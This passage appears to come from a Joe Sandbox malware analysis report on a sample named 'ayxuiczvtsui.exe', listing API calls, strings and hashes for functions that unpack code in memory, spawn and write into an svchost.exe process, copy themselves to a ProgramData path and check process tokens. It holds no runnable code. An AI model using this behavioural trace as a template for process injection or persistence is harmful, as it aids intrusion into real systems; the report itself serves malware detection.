HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,02AC4F4C,?,00000000,?,?,?), ref: 02AC4A99

Part of subcall function 02AC4B3F: lstrcpy.KERNEL32(-00000469,?), ref: 02AC4C69

Memory Dump Source

Source File: 00000013.00000002.3296108419.0000000002AC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02AC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2ac1000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess$lstrcpy
String ID:
API String ID: 25539217-0
Opcode ID: f4b5db75c5a762292561a9dddf8e2f63818b7465f9d9078f55fbbeffc0b05751
Instruction ID: b3353514b49a7c34521d01b309dfbcc030e47adac01eb05c68040429e776e28f
Opcode Fuzzy Hash: f4b5db75c5a762292561a9dddf8e2f63818b7465f9d9078f55fbbeffc0b05751
Instruction Fuzzy Hash: 7421D8768083159FC310DFA4D85498BBBE8EB8C364F64491EF589D7210DB34D9459F8A

Uniqueness

Uniqueness Score: -1.00%

Function 02AC136A Relevance: 5.1, APIs: 4, Instructions: 60memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000000), ref: 02AC13EC
HeapFree.KERNEL32(00000000), ref: 02AC13F3

Memory Dump Source

Source File: 00000013.00000002.3296108419.0000000002AC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02AC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2ac1000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: f0f3d5f5703d9b887aa2e07483db486790bf5daa0fa68f30681d37253ac87b6c
Instruction ID: df57a5e57c59c492d7ee3b33bd57dc6fe39853e22b296c7d26fd1454e4b44699
Opcode Fuzzy Hash: f0f3d5f5703d9b887aa2e07483db486790bf5daa0fa68f30681d37253ac87b6c
Instruction Fuzzy Hash: 34111276E40209ABDF50DFE58984B9EBBFCAB48355F2044A9E608E2201DF7185558BB0

Uniqueness

Uniqueness Score: -1.00%

Function 02AC1404 Relevance: 5.1, APIs: 4, Instructions: 58memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000000), ref: 02AC146A
HeapFree.KERNEL32(00000000), ref: 02AC1471
GetProcessHeap.KERNEL32(00000000,?), ref: 02AC147E
HeapFree.KERNEL32(00000000), ref: 02AC1485

Memory Dump Source

Source File: 00000013.00000002.3296108419.0000000002AC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02AC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2ac1000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: d85af6b1e922220ff51a148aa36f814e45326ab34be3b8c860cf457b4f6623cd
Instruction ID: 2413bc3b847bdd0aaf13d68fcf3cfbb6dede9a6eb03edeb1d6d0109f34b86625
Opcode Fuzzy Hash: d85af6b1e922220ff51a148aa36f814e45326ab34be3b8c860cf457b4f6623cd
Instruction Fuzzy Hash: 1B1112B1E40209ABDB009FE589847DEFBFCEF09315F20456AE909E2101DB7595448BA0

Uniqueness

Uniqueness Score: -1.00%

Function 02AC1F56 Relevance: 5.0, APIs: 4, Instructions: 42memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 02AC1CD5: GetProcessHeap.KERNEL32(00000008,-0000007F,00000001), ref: 02AC1CFD
Part of subcall function 02AC1CD5: RtlAllocateHeap.NTDLL(00000000), ref: 02AC1D04
Part of subcall function 02AC1CD5: lstrcpy.KERNEL32(00000000,00000000), ref: 02AC1D2D
Part of subcall function 02AC1CD5: GetProcessHeap.KERNEL32(00000000,?), ref: 02AC1DF6
Part of subcall function 02AC1CD5: HeapFree.KERNEL32(00000000), ref: 02AC1DFD
Part of subcall function 02AC1CD5: Sleep.KERNEL32(00001388), ref: 02AC1E08

GetProcessHeap.KERNEL32(00000000,?), ref: 02AC1FB4
HeapFree.KERNEL32(00000000), ref: 02AC1FBB
GetProcessHeap.KERNEL32(00000000,?), ref: 02AC1FC3
HeapFree.KERNEL32(00000000), ref: 02AC1FCA

Memory Dump Source

Source File: 00000013.00000002.3296108419.0000000002AC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02AC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2ac1000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$Free$AllocateSleeplstrcpy
String ID:
API String ID: 1268735806-0
Opcode ID: a3eb1bd2e581a880ea6832849574d0a884d2f6bca5e7d77c29d93abe9dc9dac1
Instruction ID: eeef14634849c4137917e26d5943ac5a44ee537d42ab8b7744589f727557f13c
Opcode Fuzzy Hash: a3eb1bd2e581a880ea6832849574d0a884d2f6bca5e7d77c29d93abe9dc9dac1
Instruction Fuzzy Hash: 6201A5B1808305AFC710DFA6D848A5BBBECFB4D314F14491EF599D2201EB35E6198F96

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: ayxuiczvtsui.exePID: 6740, Parent PID: 1088COMMON

Executed Functions

Function 004010CF Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 75
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OutputDebugStringA.KERNEL32(fail 3), ref: 004010EE
NtCreateUserProcess.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 00401122
OutputDebugStringA.KERNEL32(fail 2), ref: 00401133

Strings

fail 1, xrefs: 0040114E
Stop ok, xrefs: 00401180
Start, xrefs: 00401167
fail 2, xrefs: 0040112E
Stop Err, xrefs: 00401187
fail 3, xrefs: 004010E9

Memory Dump Source

Source File: 00000014.00000002.2218293819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.2218260046.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2218326258.0000000000402000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2218342029.0000000000403000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2218357742.0000000000404000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_ayxuiczvtsui.jbxd

Yara matches

Similarity

API ID: DebugOutputString$CreateProcessUser
String ID: Start$Stop Err$Stop ok$fail 1$fail 2$fail 3
API String ID: 976970837-1310772363
Opcode ID: f498b5b8b7e85bdb1976bf98945623132273431d24ab6f40ffb868399b8cd4d0
Instruction ID: 243eedd8a4f49eb320fdfb0d7e1e77221009fbf540129bad84db16ccdf4411bb
Opcode Fuzzy Hash: f498b5b8b7e85bdb1976bf98945623132273431d24ab6f40ffb868399b8cd4d0
Instruction Fuzzy Hash: 1421CA32605209BBCB055F94DD01E9A3F29EB0C725B214237FE00B61F4DA7AC960AB99

Uniqueness

Uniqueness Score: -1.00%

Function 005A04F4 Relevance: 13.8, APIs: 9, Instructions: 331
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,00000992,00003000,00000040,00000992,005A0000), ref: 005A05D8
VirtualAlloc.KERNELBASE(00000000,000001A9,00003000,00000040,005A003A), ref: 005A060F
VirtualAlloc.KERNELBASE(00000000,0000B2A2,00003000,00000040), ref: 005A066F
VirtualFree.KERNELBASE(00610000,00000000,00008000), ref: 005A06A5
VirtualProtect.KERNELBASE(00400000,00009000,00000004,005A04CF), ref: 005A07B4
VirtualProtect.KERNEL32(00400000,00001000,00000004,005A04CF), ref: 005A07DB

Part of subcall function 005A03A1: LoadLibraryExA.KERNELBASE(?,00000000,00000000,?), ref: 005A03DA

VirtualProtect.KERNELBASE(00400000,?,00000002,005A04CF), ref: 005A08A1
VirtualProtect.KERNELBASE(00400000,?,00000002,005A04CF,?), ref: 005A08F7
VirtualFree.KERNELBASE(00610000,00000000,00008000), ref: 005A091B

Memory Dump Source

Source File: 00000014.00000002.2218603927.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_5a0000_ayxuiczvtsui.jbxd

Similarity

API ID: Virtual$Protect$Alloc$Free$LibraryLoad
String ID:
API String ID: 1732388798-0
Opcode ID: a21c1fcf7313ad9f5ce9639c566054cbe9b701e99c7aabe4d0652ff718d7e89c
Instruction ID: 9b613606ef0c92f0990e23ddef52b87e5dae40f564bcef1198d20ac0246aac43
Opcode Fuzzy Hash: a21c1fcf7313ad9f5ce9639c566054cbe9b701e99c7aabe4d0652ff718d7e89c
Instruction Fuzzy Hash: A7D17E727002019FEF11EF54CC80F557BA6FF59710B590294ED0D9F6AADB70A921CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00422152 Relevance: 13.8, APIs: 9, Instructions: 331
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,00000992,00003000,00000040,00000992,00421C5E), ref: 00422236
VirtualAlloc.KERNEL32(00000000,000001A9,00003000,00000040,00421C98), ref: 0042226D
VirtualAlloc.KERNEL32(00000000,0000B2A2,00003000,00000040), ref: 004222CD
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00422303
VirtualProtect.KERNEL32(00400000,00000000,00000004,0042212D), ref: 00422412
VirtualProtect.KERNEL32(00400000,00001000,00000004,0042212D), ref: 00422439
VirtualProtect.KERNEL32(00000000,?,00000002,0042212D), ref: 004224FF
VirtualProtect.KERNEL32(00000000,?,00000002,0042212D,?), ref: 00422555
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00422579

Memory Dump Source

Source File: 00000014.00000002.2218447357.0000000000421000.00000040.00000001.01000000.00000009.sdmp, Offset: 00421000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_421000_ayxuiczvtsui.jbxd

Similarity

API ID: Virtual$Protect$Alloc$Free
String ID:
API String ID: 2574235972-0
Opcode ID: a21c1fcf7313ad9f5ce9639c566054cbe9b701e99c7aabe4d0652ff718d7e89c
Instruction ID: 825025660836190913fdd1bb514e6233e9fadebdfec7ebde24a9587a44909d83
Opcode Fuzzy Hash: a21c1fcf7313ad9f5ce9639c566054cbe9b701e99c7aabe4d0652ff718d7e89c
Instruction Fuzzy Hash: 2FD19E72700100AFEB14EF54CD80F6277A6FF68310B890295ED0D9F26ADB74A921CB6C

Uniqueness

Uniqueness Score: -1.00%

Function 004015BE Relevance: 1.5, APIs: 1, Instructions: 20
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(00000000,00000000,00000000,75539350,00003000,00000004), ref: 004015DB

Memory Dump Source

Source File: 00000014.00000002.2218293819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.2218260046.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2218326258.0000000000402000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2218342029.0000000000403000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2218357742.0000000000404000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_ayxuiczvtsui.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: c89adba908ca871be9ce827485f4956cce24457d38a3e40d239f8f1f7eb3a445
Instruction ID: 5f65e376ed05142d156b79c11863de9d8c1410112659dc892d0819c29325736b
Opcode Fuzzy Hash: c89adba908ca871be9ce827485f4956cce24457d38a3e40d239f8f1f7eb3a445
Instruction Fuzzy Hash: 71E0EC7556020CBBEF01CF90DD46FE977BCEB00715F104150B904D6090D775AB149B95

Uniqueness

Uniqueness Score: -1.00%

Function 0040160F Relevance: 1.5, APIs: 1, Instructions: 16
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtWriteVirtualMemory.NTDLL(00401692,00000000,00000000,?,?), ref: 00401623

Memory Dump Source

Source File: 00000014.00000002.2218293819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.2218260046.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2218326258.0000000000402000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2218342029.0000000000403000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2218357742.0000000000404000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_ayxuiczvtsui.jbxd

Yara matches

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: dd962de9b64438870b2894e6f6e0c6ee5c7c009fcec118a3b940f06222a4811c
Instruction ID: 5a808b04aabe2117a938e4500ca1c1b9b1ef177e0b005ac0e652288855810eb1
Opcode Fuzzy Hash: dd962de9b64438870b2894e6f6e0c6ee5c7c009fcec118a3b940f06222a4811c
Instruction Fuzzy Hash: 78D0C93255410DBFCF029FA4DD05CAA7B6EFB09211B004665FE29D2060D6329A34AB91

Uniqueness

Uniqueness Score: -1.00%

Function 004015EE Relevance: 1.5, APIs: 1, Instructions: 15
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL(00000044,?,00000010,?,004010CF), ref: 00401602

Memory Dump Source

Source File: 00000014.00000002.2218293819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.2218260046.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2218326258.0000000000402000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2218342029.0000000000403000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2218357742.0000000000404000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_ayxuiczvtsui.jbxd

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 4da293ee12ca45bf45e600fb64d5736a10573e54717f0195352ef75157bb5ffd
Instruction ID: 2a43cff2ce15a73ccafebcd56fae5865f2d1f9501d48921ddcbb68ebc334f4a9
Opcode Fuzzy Hash: 4da293ee12ca45bf45e600fb64d5736a10573e54717f0195352ef75157bb5ffd
Instruction Fuzzy Hash: C1D0C93205410EBFDF019FA0DD05CEA3B6DEB05255B004121FA19D1060E632D6699B90

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 70
sleepprocessstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCommandLineA.KERNEL32 ref: 0040100A
StrStrIA.KERNELBASE(00000000, /u), ref: 00401018
Sleep.KERNEL32(00001388), ref: 00401027
ExitProcess.KERNEL32 ref: 00401039
GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040107F
SetCurrentDirectoryW.KERNEL32(?), ref: 0040108C
lstrcatW.KERNEL32(?,?), ref: 004010A7
CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 004010C3

Strings

/u, xrefs: 00401012

Memory Dump Source

Source File: 00000014.00000002.2218293819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.2218260046.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2218326258.0000000000402000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2218342029.0000000000403000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2218357742.0000000000404000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_ayxuiczvtsui.jbxd

Yara matches

Similarity

API ID: DirectoryProcess$CommandCreateCurrentExitLineSleepSystemlstrcat
String ID: /u
API String ID: 4042104365-4118749740
Opcode ID: b747ae3141204b1c38ca21bc4f55e1c812c318ab8368f1fa781a2d1dd495982a
Instruction ID: 96ee623e9da2e0af38eded0e061056f2ac1dfe5269435d034bd7705fbe78fb85
Opcode Fuzzy Hash: b747ae3141204b1c38ca21bc4f55e1c812c318ab8368f1fa781a2d1dd495982a
Instruction Fuzzy Hash: 36115472802619ABDB20AFB1DD0DEDE7B7CAF08705F10003AF605F20A5D63897458BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00401CB5 Relevance: 3.0, APIs: 2, Instructions: 8
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000,00000000,0040157D,00000000,00000000,00000000,?,530C1AEE,004020E8), ref: 00401CC2
RtlFreeHeap.NTDLL(00000000,?,530C1AEE,004020E8), ref: 00401CC9

Memory Dump Source

Source File: 00000014.00000002.2218293819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.2218260046.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2218326258.0000000000402000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2218342029.0000000000403000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2218357742.0000000000404000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_ayxuiczvtsui.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: a17b4e92315cbfe38b156d6706c7fcabeb76f83999710892967727563ebf0b78
Instruction ID: de2e74cc2c5d9c26438789ecc4f5efd00e9e3bcaa0604652a6375203050d3e1d
Opcode Fuzzy Hash: a17b4e92315cbfe38b156d6706c7fcabeb76f83999710892967727563ebf0b78
Instruction Fuzzy Hash: E3C04C31449240FBEF015F909B0CB0A7ABDAB84743F008468F149A11A486748944DB15

Uniqueness

Uniqueness Score: -1.00%

Function 00401C79 Relevance: 3.0, APIs: 2, Instructions: 6
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000008,?,00401D53,00001000,00000000,00000000,?,00401467,00000000,?,?,?,?,00401295), ref: 00401C7F
RtlAllocateHeap.NTDLL(00000000,?,00401467,00000000,?,?,?,?,00401295), ref: 00401C86

Memory Dump Source

Source File: 00000014.00000002.2218293819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.2218260046.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2218326258.0000000000402000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2218342029.0000000000403000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2218357742.0000000000404000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_ayxuiczvtsui.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: af29794abdbade58b16b445bdb6112b6466faf214ccefe91d731fee372fe0b5d
Instruction ID: bbb82e670732032ebf8e303bc8a39f8b906a07d9cff939e05880545c35f94fa9
Opcode Fuzzy Hash: af29794abdbade58b16b445bdb6112b6466faf214ccefe91d731fee372fe0b5d
Instruction Fuzzy Hash: 9EB00275546240EBDE416FE59F0DA097E7DBB84743F008454B349E5064CA758514DB25

Uniqueness

Uniqueness Score: -1.00%

Function 005A03A1 Relevance: 1.6, APIs: 1, Instructions: 56
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExA.KERNELBASE(?,00000000,00000000,?), ref: 005A03DA

Memory Dump Source

Source File: 00000014.00000002.2218603927.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_5a0000_ayxuiczvtsui.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: c1a17069605dab7d48ac39e7c644e9b5868b307e3d54936d315e395ad9e50ff5
Instruction ID: d01b67735db5a20c22eb43233b34bb1ab1f486084014715de57c60eecb02d768
Opcode Fuzzy Hash: c1a17069605dab7d48ac39e7c644e9b5868b307e3d54936d315e395ad9e50ff5
Instruction Fuzzy Hash: B401B573A101046BEF208E19DC40B6F7B59FFC6720F299D26E905EB281C574DC0245A0

Uniqueness

Uniqueness Score: -1.00%

Function 00401593 Relevance: 1.5, APIs: 1, Instructions: 18
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,00401442,00401295), ref: 004015AA

Memory Dump Source

Source File: 00000014.00000002.2218293819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.2218260046.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2218326258.0000000000402000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2218342029.0000000000403000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2218357742.0000000000404000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_ayxuiczvtsui.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: d38c51f324250414f169d42e986cd6cb3458d82db6cc8dc1e70cf848005a2c4a
Instruction ID: 98ea57f8acb340bf8185d7c41957bfe50ebb8c53553d8a1b8998a7004bdb3259
Opcode Fuzzy Hash: d38c51f324250414f169d42e986cd6cb3458d82db6cc8dc1e70cf848005a2c4a
Instruction Fuzzy Hash: 47D05E33C0830C5ACB04EBF19A0E8CD77FC9B0C214F1004A6E505B2080FA76EA5883A8

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00401264 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26COMMON

Download Yara Rule

APIs

StrStrIA.SHLWAPI(00000000, /p=,00401033,00000000), ref: 0040126D
StrToIntA.SHLWAPI(-00000004), ref: 0040127B
GetModuleFileNameW.KERNEL32(00000000,C:\ProgramData\{6B82AE99-8B99-4584-91C5-1F3FDB5B00DE}\ayxuiczvtsui.exe,00000104), ref: 004012A1

Strings

/p=, xrefs: 00401264
C:\ProgramData\{6B82AE99-8B99-4584-91C5-1F3FDB5B00DE}\ayxuiczvtsui.exe, xrefs: 0040129A

Memory Dump Source

Source File: 00000014.00000002.2218293819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.2218260046.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2218326258.0000000000402000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2218342029.0000000000403000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2218357742.0000000000404000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_ayxuiczvtsui.jbxd

Yara matches

Similarity

API ID: FileModuleName
String ID: /p=$C:\ProgramData\{6B82AE99-8B99-4584-91C5-1F3FDB5B00DE}\ayxuiczvtsui.exe
API String ID: 514040917-67528572
Opcode ID: 2d4bb584e25658cc2728f9be044f66e59ae58770c4c6207fcfe1ce4352e57228
Instruction ID: a97e36b21e4f6c4b508bbe1c7bc1ce47f756939332ff9af57f8a63180c09d7ad
Opcode Fuzzy Hash: 2d4bb584e25658cc2728f9be044f66e59ae58770c4c6207fcfe1ce4352e57228
Instruction Fuzzy Hash: EAE048B068130177EA502F719E0FB156A985B08B4FF544476BA45F41F5DAFCC241451D

Uniqueness

Uniqueness Score: -1.00%

Function 004234A8 Relevance: 6.4, APIs: 4, Instructions: 396COMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(00432918,0000015C), ref: 0042358F
__aulldiv.LIBCMT ref: 00423916
__common_dcos_data.LIBCMT ref: 0042393C
__common_dcos_data.LIBCMT ref: 00423998

Memory Dump Source

Source File: 00000014.00000002.2218447357.0000000000421000.00000040.00000001.01000000.00000009.sdmp, Offset: 00421000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_421000_ayxuiczvtsui.jbxd

Similarity

API ID: __common_dcos_data$DirectoryWindows__aulldiv
String ID:
API String ID: 3713252173-0
Opcode ID: d23a282598ad219914c9b2bdc5d99ce2b0672d1c0f91bb2d386cbf8a1c0af863
Instruction ID: ec485fc663059ce4ae46598323261169b09f174663d50ce322c37d4fa9724364
Opcode Fuzzy Hash: d23a282598ad219914c9b2bdc5d99ce2b0672d1c0f91bb2d386cbf8a1c0af863
Instruction Fuzzy Hash: 76E1D2727003229BC718DF38EDA06E537A2EB98719F59813BD800C73E5E678AD45879D

Uniqueness

Uniqueness Score: -1.00%

Function 00401305 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 103memoryCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(NTDLL.DLL,?,0040128B), ref: 0040130B
RtlAllocateHeap.NTDLL ref: 00401387

Strings

NTDLL.DLL, xrefs: 00401306

Memory Dump Source

Source File: 00000014.00000002.2218293819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.2218260046.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2218326258.0000000000402000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2218342029.0000000000403000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2218357742.0000000000404000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_ayxuiczvtsui.jbxd

Yara matches

Similarity

API ID: AllocateHandleHeapModule
String ID: NTDLL.DLL
API String ID: 3205619-1613819793
Opcode ID: 197974c3615feffb27709de3e24c9eccab4d8452ca4107e1a8abdba4d6cf989d
Instruction ID: 661fe251d33bcd873fe0306d0fa480983da9c30ce6244cc3b298440f3ea03910
Opcode Fuzzy Hash: 197974c3615feffb27709de3e24c9eccab4d8452ca4107e1a8abdba4d6cf989d
Instruction Fuzzy Hash: 5E213EA5B9079479E13025761E8EF2759AD85E6F99360817FBB04B21D6D8FC4C04C06C

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: svchost.exePID: 5876, Parent PID: 6740COMMON

Executed Functions

Function 02F72BA4 Relevance: 3.1, APIs: 2, Instructions: 58nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000040,?), ref: 02F72BDA
NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?), ref: 02F72C23

Memory Dump Source

Source File: 00000015.00000002.3296339935.0000000002F71000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_2f71000_svchost.jbxd

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 180a76daf0a565fea59e27cec7b1af36b3fd4bbdc8cbb1956c7010a9206e5927
Instruction ID: 25bfc07191fee0dcf4637e8c247617e633d01b134b33e2edd5d03e4b2d269eff
Opcode Fuzzy Hash: 180a76daf0a565fea59e27cec7b1af36b3fd4bbdc8cbb1956c7010a9206e5927
Instruction Fuzzy Hash: D1110A35D10105AFCB09CF98C954EE977B8FF58324F1502BDE9259B291DB30AA45CB60

Uniqueness

Uniqueness Score: -1.00%

Function 02F7338D Relevance: 19.7, APIs: 13, Instructions: 156
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenProcessToken.ADVAPI32(000000FF,00000008,?,0000011C), ref: 02F733BE
GetTokenInformation.KERNELBASE(?,00000002,00000000,00000000,?), ref: 02F733E0
GetLastError.KERNEL32 ref: 02F733E2
GetProcessHeap.KERNEL32(00000008,?), ref: 02F73401
RtlAllocateHeap.NTDLL(00000000), ref: 02F73408
GetTokenInformation.KERNELBASE(?,00000002,00000000,?,?), ref: 02F73428
GetSidIdentifierAuthority.ADVAPI32(?), ref: 02F73448
GetSidSubAuthorityCount.ADVAPI32(?), ref: 02F7346B
GetSidSubAuthority.ADVAPI32(?,00000000), ref: 02F73480
GetSidSubAuthority.ADVAPI32(?,?), ref: 02F73497
FindCloseChangeNotification.KERNELBASE(00000000), ref: 02F7351A
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02F73527
HeapFree.KERNEL32(00000000), ref: 02F7352E

Memory Dump Source

Source File: 00000015.00000002.3296339935.0000000002F71000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_2f71000_svchost.jbxd

Yara matches

Similarity

API ID: AuthorityHeap$ProcessToken$Information$AllocateChangeCloseCountErrorFindFreeIdentifierLastNotificationOpen
String ID:
API String ID: 3355550324-0
